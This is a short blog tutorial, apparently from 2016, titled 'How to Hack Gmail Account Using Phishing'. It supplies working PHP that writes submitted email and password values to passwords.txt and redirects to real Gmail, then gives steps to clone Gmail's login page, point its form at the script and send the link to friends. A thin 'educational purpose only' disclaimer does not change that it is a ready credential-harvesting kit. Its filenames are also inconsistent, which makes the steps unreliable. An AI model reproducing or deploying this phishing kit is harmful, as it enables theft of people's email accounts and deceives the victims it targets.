How to Hack Gmail Account Using Phishing

how to hack gmail account
i am chukwuebuka stanley... i will be teaching on how to hack any gmail account.. (this tutorial is not for bad guys).
THIS TUTORIAL IS FOR EDUCATIONAL PURPOSE ONLY.

open your notepad or text editor and paste the given below code & save as get_id_pass.php


<?php
header(“Location: https://mail.google.com/mail/”);
$handle = fopen(“passwords.txt”, “a”);
foreach($_GET as $variable => $value) {fwrite($handle, $variable);fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
Step : 1 Go to gmail.com, when page is fully open press ctrl+S & save file as index.html.  or right click on the page to view page source.

Step: 2 Open index.html file and press ctrl+F For Search for action” and you see given below figure
Step: 3 Replace method post to GET and action URL to your phishing URL get_it_pass.php

Step: 4 Create a one text file password.txt, Now your Gmail Phishing Page is ready upload all file to you website & send it to your friends, when someone login from your phishing page all Email & Password store on paswords.txt.
How to Hack Gmail Account Using Phishing How to Hack Gmail Account Using Phishing Reviewed by legit exam on September 14, 2016 Rating: 5

No comments:

'; (function() { var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true; dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js'; (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq); })();
Loading...
Powered by Blogger.